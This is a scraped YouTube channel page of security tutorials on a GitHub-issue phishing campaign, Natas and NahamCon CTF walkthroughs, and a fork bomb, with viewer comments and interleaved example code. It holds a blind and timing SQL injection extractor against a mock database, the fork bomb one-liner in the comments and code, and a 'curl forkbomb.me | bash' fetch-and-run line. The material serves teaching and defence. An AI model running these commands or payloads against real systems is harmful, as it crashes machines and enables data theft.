- Videos: 33
- Views: 19,830
MalwareCube
Joined 16 Nov 2014
Cybersecurity, tech, stuff.
github just tried to phish me...
In this video, I share one of the more interesting and clever phishing attempts I've seen in a while. This one’s different: the attacker is using the legitimate GitHub "issues" feature to push their phishing attempt through trusted services.
Watch as we break down how exactly the attacker did it and even uncover what malicious code it tries to social engineer us into running. After doing some classic investigation and IOC extraction, we come to find this campaign is part of the Lumma Stealer malware family!
Views: 697
Videos
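The point of the campaign described above is that the relay is trustworthy while the content is not: the mail really does come from GitHub, signed by GitHub, because the attacker typed the lure into an issue and let GitHub's notification system deliver it. The triage below is an added example, not the video's own code and not the campaign's real indicators. It parses a constructed notification (reserved example.net/example.org domains, placeholder DKIM tag values), confirms the sender and DKIM signer are github.com, and then extracts and defangs every body link that leaves GitHub, which is where the actual IOCs live in this kind of message.

```python
"""Added example, not the video's own code and not the campaign's real
indicators: triage of a GitHub issue-notification email. The sender and
DKIM signer are genuinely github.com, but the body is attacker-written,
so the IOCs are the links that leave GitHub. SAMPLE_EMAIL is constructed;
example.net/.org are reserved documentation domains."""
import email
import re
from email import policy
from email.utils import parseaddr
from typing import Optional
from urllib.parse import urlparse

# Constructed sample (simplified headers; DKIM tag values are placeholders).
SAMPLE_EMAIL = """\
From: attacker-handle <notifications@github.com>
To: victim <victim@example.org>
Subject: [victim/repo] Security vulnerability found (Issue #1)
DKIM-Signature: v=1; a=rsa-sha256; d=github.com; s=selector; h=from:to:subject; bh=PLACEHOLDER; b=PLACEHOLDER
Content-Type: text/plain; charset=utf-8

@victim we detected a critical vulnerability in your repository.
Review the report here: https://github-scanner.example.net/report/victim
Issue: https://github.com/victim/repo/issues/1
--
Reply to this email directly or view it on GitHub:
https://github.com/victim/repo/issues/1#issuecomment-1
"""

URL_RE = re.compile(r'https?://[^\s<>"\')\]]+')


def parse(raw: str):
    return email.message_from_string(raw, policy=policy.default)


def dkim_signer(msg) -> Optional[str]:
    """The d= tag of the DKIM-Signature header: the domain that vouched for the message."""
    sig = msg.get("DKIM-Signature")
    if not sig:
        return None
    m = re.search(r'(?:^|;)\s*d=([^;\s]+)', str(sig))
    return m.group(1).lower() if m else None


def is_first_party(host: str) -> bool:
    """github.com and its subdomains. github.io (user pages) is deliberately
    NOT first-party: anyone can publish content there."""
    host = host.lower()
    return host == "github.com" or host.endswith(".github.com")


def body_urls(msg):
    body = msg.get_body(preferencelist=("plain",))
    return URL_RE.findall(body.get_content()) if body else []


def external_urls(msg):
    """Body links whose host is not GitHub: the attacker's landing page(s)."""
    return sorted({u for u in body_urls(msg)
                   if not is_first_party(urlparse(u).hostname or "")})


def defang(url: str) -> str:
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage(raw: str) -> dict:
    msg = parse(raw)
    _, sender = parseaddr(str(msg["From"]))
    signer = dkim_signer(msg)
    relayed_by_github = sender.lower().endswith("@github.com") and signer == "github.com"
    ext = external_urls(msg)
    return {
        "sender": sender,
        "dkim_signer": signer,
        "relayed_by_github": relayed_by_github,
        "external_urls": [defang(u) for u in ext],
        # A genuine GitHub notification that points off-platform is exactly the
        # pattern in the video: legitimate relay, attacker-controlled content.
        "verdict": ("suspicious: legitimate relay, external links" if ext
                    else "no external links"),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EMAIL).items():
        print(f"{key}: {value}")
```

Note that a passing SPF/DKIM check is not evidence of benign content here; the check that matters is whether a notification from a repository you do not own is steering you to a host outside GitHub, and that is the link to submit to your sandbox or VirusTotal rather than click.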
this one-liner will crash your system
2.8K views, 3 months ago
Do not 'curl forkbomb.me | bash' :-)
How to Pivot and Tunnel on the OSCP
2.1K views, 6 months ago
How can we perform lateral movement using a compromised host to reach the internal network? Ligolo-NG is how. Ligolo-NG: github.com/nicocha30/ligolo-ng
How to Fix and Debug Exploit Code
272 views, 6 months ago
Sometimes a public exploit you locate contains broken code, throws vague errors, or fails to achieve your intended goal. It's important to be able to troubleshoot and debug these issues effectively; otherwise, you'll find yourself endlessly spinning your wheels. Especially on the OSCP exam. In this video, I aim to demystify the methodology of approaching fixing exploits and explore ways in whic...
Day 17 - I Tawt I Taw A C2 Tat! (TryHackMe Advent of Cyber 2023)
11K views, 9 months ago
This is a video walkthrough of Day 17 for the Advent of Cyber 2023 event. In today's task, we look at the SiLK suite, and how it can be used to identify network behaviour, patterns, and anomalies. Launch Advent of Cyber: tryhackme.com/r/christmas 0:00 - Introduction and Story 1:25 - Accessing the Machine 2:52 - Network Traffic Data 7:00 - PCAPs vs Network Flows 9:13 - How to Collect and Process...
Learn to Hack For Free | TryHackMe Advent of Cyber 2023
67 views, 9 months ago
tryhackme.com/christmas #tryhackme #hacking #cybersecurity
Live Phishing Investigation and Response
119 views, 1 year ago
Join me as I delve into a live investigation of a recent phishing email, exposing its attempt to steal victims' credit card information. I also cover reporting the malicious webpages at the registrar level to (hopefully) hinder their campaign.
NahamCon CTF 2023 - Ninety One
76 views, 1 year ago
A quick walk-through of the "Ninety One" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
NahamCon CTF 2023 - Glasses
87 views, 1 year ago
A quick walk-through of the "Glasses" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
NahamCon CTF 2023 - Fast Hands
140 views, 1 year ago
A quick walk-through of the "Fast Hands" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
NahamCon CTF 2023 - Online Chatroom
193 views, 1 year ago
A quick walk-through of the "Online Chatroom" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
Session Hijacking Attack | Natas: OverTheWire (Level 18)
122 views, 1 year ago
In Level 18 of OverTheWire's Natas CTF wargame, we are able to leverage a brute-forcing attack to hijack a valid admin PHPSESSID on the webserver. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas Session Hijacking Attack: owasp.org/www-community/attacks/Session_hijacking_attack PHP session_id: www.php.net/manual/en/function.session-id.php 0:00 -...
SQL Injection Timing Attack | Natas: OverTheWire (Level 17)
143 views, 1 year ago
In Level 17 of OverTheWire's Natas CTF wargame, we are able to leverage the SLEEP() statement in SQL to infer a blind response for our SQL injection in order to brute force the correct password. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas 0:00 - Introduction 0:33 - Source Code Walkthrough 1:57 - Demonstration and Solution 4:40 - Python Solu...
Blind Command Substitution RCE | Natas: OverTheWire (Level 16)
111 views, 1 year ago
In Level 16 of OverTheWire's Natas CTF wargame, we are able to leverage blind command substitution and brute force automation to get remote code execution on the web server. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas Command Substitution: www.gnu.org/software/bash/manual/html_node/Command-Substitution.html 0:00 - Introduction 0:20 - Source...
Blind SQL Brute Forcing | Natas: OverTheWire (Level 15)
160 views, 1 year ago
In Level 15 of OverTheWire's Natas CTF wargame, we tackle Blind SQL Injection and brute force a user's password. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas Blind SQL Injection: owasp.org/www-community/attacks/Blind_SQL_Injection Python `string` Module: docs.python.org/3/library/string.html 0:00 - Introduction 0:40 - Source Code Walkthrough...
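Levels 15 and 17 above are the same attack with two different oracles: in Level 15 the page says whether the query matched, in Level 17 it says nothing and only the response time leaks. The block below is an added example, not the walkthrough's own code. It runs the character-by-character extraction against a constructed in-memory SQLite mock; the table, the column names, the `natas16` row and `SECRET` are invented, and because SQLite has no `SLEEP()` one is registered by hand (MySQL's `IF(cond, SLEEP(n), 0)` becomes `CASE WHEN ... THEN SLEEP(n) ELSE 0 END` here). The same `extract()` loop drives both oracles.

```python
"""Added example, not the walkthrough's own code: the character-by-character
extraction behind Natas 15 (boolean oracle) and Natas 17 (timing oracle),
run against a constructed in-memory SQLite mock. Table, column names, the
'natas16' row and SECRET are invented; SLEEP() is registered by hand."""
import sqlite3
import string
import time

SECRET = "Kj7qX2"            # constructed value the attacker cannot read directly
CHARSET = string.ascii_letters + string.digits
TARGET = "natas16"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (TARGET, SECRET))
    # Stand-in for MySQL's SLEEP(): sleeps, then evaluates to 0.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    return conn


CONN = make_db()


def vuln_lookup(username: str):
    # Deliberately vulnerable, as in the challenge: input is concatenated into SQL.
    return CONN.execute(
        f"SELECT * FROM users WHERE username='{username}'").fetchall()


def exists_page(username: str) -> str:
    """Level 15 style: the response tells you whether the query matched."""
    return "This user exists." if vuln_lookup(username) else "This user doesn't exist."


def silent_page(username: str) -> str:
    """Level 17 style: the response never changes; only its timing can leak."""
    vuln_lookup(username)
    return "OK"


def probe(position: int, char: str, delay=None) -> str:
    """Injected username that closes the quote and asks one yes/no question:
    is character `position` of the password equal to `char`?"""
    cond = f"SUBSTR(password,{position},1)='{char}'"
    if delay is None:
        return f"{TARGET}' AND {cond} AND '1'='1"
    # Sleep only when the guess is right; the delay itself is the answer.
    return (f"{TARGET}' AND (CASE WHEN {cond} THEN SLEEP({delay}) ELSE 0 END)"
            f" AND '1'='1")


def boolean_oracle(position: int, char: str) -> bool:
    return exists_page(probe(position, char)) == "This user exists."


def timing_oracle(position: int, char: str, delay: float = 0.2) -> bool:
    t0 = time.monotonic()
    silent_page(probe(position, char, delay))
    return time.monotonic() - t0 >= delay / 2


def extract(oracle, max_len: int = 32) -> str:
    """Recover the secret one character at a time. Stops at the first position
    where nothing in CHARSET matches (end of string, or a char outside CHARSET)."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(pos, ch):
                found += ch
                break
        else:
            break
    return found


if __name__ == "__main__":
    print("boolean oracle:", extract(boolean_oracle))
    print("timing oracle: ", extract(timing_oracle))
```

Two details carry over to the real levels: SQLite's `=` on text is case-sensitive by default, whereas MySQL's default collation is not, which is why the Natas solutions need `LIKE BINARY` or `BINARY` comparisons; and the timing oracle only costs one delay per position (the wrong guesses return immediately), so it is slower than the boolean one by a constant, not by a factor of the charset size.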
SQL Injection | Natas: OverTheWire (Level 14)
65 views, 1 year ago
Magic Bytes & Hex Editing RCE | Natas: OverTheWire (Level 13)
163 views, 1 year ago
File Upload RCE | Natas: OverTheWire (Level 12)
105 views, 1 year ago
XOR Deep Dive | Natas: OverTheWire (Level 11)
128 views, 1 year ago
Filtered PHP Command Injection | Natas: OverTheWire (Level 10)
80 views, 1 year ago
PHP Command Injection | Natas: OverTheWire (Level 9)
71 views, 1 year ago
PHP Base64 & Hex Decoding | Natas: OverTheWire (Level 8)
131 views, 1 year ago
Local File Inclusion (LFI) Attacks | Natas: OverTheWire (Level 7)
64 views, 1 year ago
Introduction to Port Scanning | Nmap Essentials
81 views, 1 year ago
Python Secret POSTing | Natas: OverTheWire (Level 6)
55 views, 1 year ago
Look to the Cookie! 🍪 | Natas: OverTheWire (Level 5)
110 views, 1 year ago
HTTP Header Manipulating | Natas: OverTheWire (Level 4)
106 views, 1 year ago
Robots.txt | Natas: OverTheWire (Level 3)
67 views, 1 year ago
Directory Indexing Attacks | Natas: OverTheWire (Level 2)
212 views, 1 year ago
I got the same email. John Hammond made a video about the same "fake captcha" phishing attempt this week too. Was funny to see it in the wild literally the day after watching that video.
Hey, great video! Saw myself in the VT community tab :D Keep it up!
no way, that's really cool! Thank you.
I laughed so hard when I saw "press pasta then enter". Asking me to run your malware on my computer for you is crazy lol
Fr
5:48 19/96 vendors spam it malicious and -50 community score for me on virustotal at the moment of writing this comment
And still climbing!
Literally at 3:20 I noticed the creation date and 4 seconds later you pointed that out, awesome. And woah, that captcha and JS was wild. Thank you for this great contribution to the community
Thank you! I got lucky with this sample, it was the perfect amount of clever and entertaining
got the same email but mine was from 'thehackingsage/hacktronian'
Great video Andrew, it's so unique what Copy Paste can do! John Hammond covered the same technique too!
Hi Andrew, I wanted to ask this during the Cyber Mentor live session, but I missed the notification, unfortunately. Do I need to learn Python and scripting for a SOC analyst role? If so, where should I start?
@NoNoandNo-no yeah it can be useful as you progress in the SOC or move into more engineering roles. I wouldn't put it as a requirement as an entry level analyst (meaning I think there are other areas that should take priority first) but you'll sometimes see it as a "nice to have" on job postings. I can only suggest TCM's python course as personally I haven't taken any others to compare, but I thought it was a great foundation.
Very good walkthrough. Bravo
How well does port scanning run through this? Still hot garbage, or does this work a lot better?
It's way faster than some of the other methods. And you can still run syn scans through it, which if I remember correctly is a limitation with something like Chisel.
THHHEEE new standard.
thanks for this video, this is exactly what i needed. setting up tunnelling feels so confusing for me and you've covered everything i need in this video.
Thanks, I'm so glad to hear! Tunneling can be really confusing and fortunately Ligolo makes it as simple as possible.
Hey man, nice vid, didn't realize Ligolo makes it so simple!
Very cool! Great video
one liner admin is better
?
This was pretty cool.
Tested it on my MacBook, which is BSD-based, and surprisingly there was a level of protection, so it didn't crash my system, interestingly enough! Great video!
Great video, honestly. Well-spoken, confident, nice editing. Wish you look at growing big
Why make it so unnecessarily complex? Just keep it simple and run "make -j"
This was nice.😅
I don't get why there's a pipeline there. Like I always thought that command1 | command2 redirects the output of command1 to the input of command2. Why is it :|: and not something like :&&: ???
Great question, and you're correct about the pipe. In this case, the actual data or output being passed through the pipe is not used. If a process takes nothing into stdin, you can still pipe to it. Using && would make the second call dependent on the successful completion of the first call, and so the pipe is used to execute both recursive calls in parallel without conditions. To your point, ":(){ :&:; }; :" will also work in most cases.
@MalwareCube thx for making this clear
Making that function more readable is an awesome way of teaching what it does.
So basically a nuclear bomb
iirc most distros using systemd mitigate forkbombs by setting a ulimit
Yep, you can set limits on systemd unit files, and you can also set a ulimit to a smaller value in login scripts.
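What the ulimit mitigation discussed in this thread actually does, as an added example that is not from the video or from the commenters: `ulimit -u` sets RLIMIT_NPROC, a per-user cap on process count, and a fork bomb under that cap dies with EAGAIN ("Resource temporarily unavailable") instead of exhausting the machine. The block lowers the limit in a forked child so the caller is untouched, reads it back, and then shows the kernel refusing a fork once the cap is hit. It assumes Linux (`os.fork`, `resource`); root, and anything holding CAP_SYS_RESOURCE or CAP_SYS_ADMIN, bypasses the cap, so the fork is reported as "allowed" there. The persistent locations in the comments are assumed typical paths, not something the page states.

```python
"""Added example, not from the video or this comment thread: what the ulimit
mitigation does. RLIMIT_NPROC (shell: ulimit -u) caps the number of processes
one user may own, so a fork bomb hits EAGAIN at the cap instead of exhausting
the machine. Linux-only (os.fork, resource); root and processes holding
CAP_SYS_RESOURCE/CAP_SYS_ADMIN are not subject to the cap."""
import os
import resource

# The one-liner from the video, kept as a string so nothing here runs it.
# ':' is the function name; ':|:&' starts two copies in parallel through a
# pipe (no data flows, the pipe is just parallelism); the final ':' calls it.
FORK_BOMB = ":(){ :|:& };:"

# Where the same cap is set persistently (assumed typical locations):
#   /etc/security/limits.conf   ->  *  hard  nproc  4096
#   systemd unit [Service]      ->  TasksMax=4096
#   /etc/systemd/system.conf    ->  DefaultTasksMax=...


def run_in_child(fn):
    """Run fn() in a forked child and return its string result, so limit
    changes made inside fn() never touch the calling process."""
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:  # child
        os.close(r)
        try:
            out = fn()
        except Exception as exc:  # report instead of dying silently
            out = f"error:{exc!r}"
        os.write(w, out.encode())
        os._exit(0)
    os.close(w)
    chunks = []
    while True:
        chunk = os.read(r, 4096)
        if not chunk:
            break
        chunks.append(chunk)
    os.close(r)
    os.waitpid(pid, 0)
    return b"".join(chunks).decode()


def lower_soft_limit(soft: int) -> str:
    """Lower the soft RLIMIT_NPROC to `soft` (what 'ulimit -S -u N' in a
    login script does) and read it back."""
    def body():
        _, hard = resource.getrlimit(resource.RLIMIT_NPROC)
        if hard != resource.RLIM_INFINITY and soft > hard:
            return f"hard limit {hard} is below {soft}"
        resource.setrlimit(resource.RLIMIT_NPROC, (soft, hard))
        return str(resource.getrlimit(resource.RLIMIT_NPROC)[0])
    return run_in_child(body)


def fork_under_limit(soft: int) -> str:
    """Lower RLIMIT_NPROC to `soft`, then attempt one more fork.
    'refused': the kernel enforced the cap (this is what stops a fork bomb).
    'allowed': cap not reached, or the caller is privileged."""
    def body():
        _, hard = resource.getrlimit(resource.RLIMIT_NPROC)
        resource.setrlimit(resource.RLIMIT_NPROC, (soft, hard))
        try:
            pid = os.fork()
        except BlockingIOError:  # EAGAIN: "Resource temporarily unavailable"
            return "refused"
        if pid == 0:
            os._exit(0)
        os.waitpid(pid, 0)
        return "allowed"
    return run_in_child(body)


def cap_is_enforced() -> bool:
    """Root bypasses RLIMIT_NPROC entirely; treat everyone else as capped."""
    return os.geteuid() != 0


if __name__ == "__main__":
    print("soft limit read back in child:", lower_soft_limit(64))
    print("fork with limit 1:", fork_under_limit(1))
```

The limit counts every process the user already owns, not just the children of the shell that set it, which is why a low value in a login script can break an interactive session that runs many background jobs; pick a number above your normal working set and let the hard limit in limits.conf or TasksMax= be the real backstop.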
why no comments man
I just tried this out using your video. What a game changer! Thanks!
W00t! I'm super glad it was helpful, that's awesome to see
Loved the idea of showing WireShark, I don’t see that being showcased enough when debugging why scripts don’t work out of the box
Love this video man, keep it up!
Thank you, sincerely!
This is the best walkthrough, thanks man
Thank you for the walkthrough! It was really clear, and you made it easy to understand the meaning of each step (I find it most important)
Thank you for your nice video. :)
This was an amazing presentation. This task was a huge boring wall of text, there is no way I would have done this without your help. Thank you.
Thorough but a bit long for beginners
Excellent walkthrough. Thanks a lot!!
Great walkthrough, thumbs up!
💥
Superb presentation with great tips, hints, explanations, deep dives, and process flow! Subscribed!
Thank you!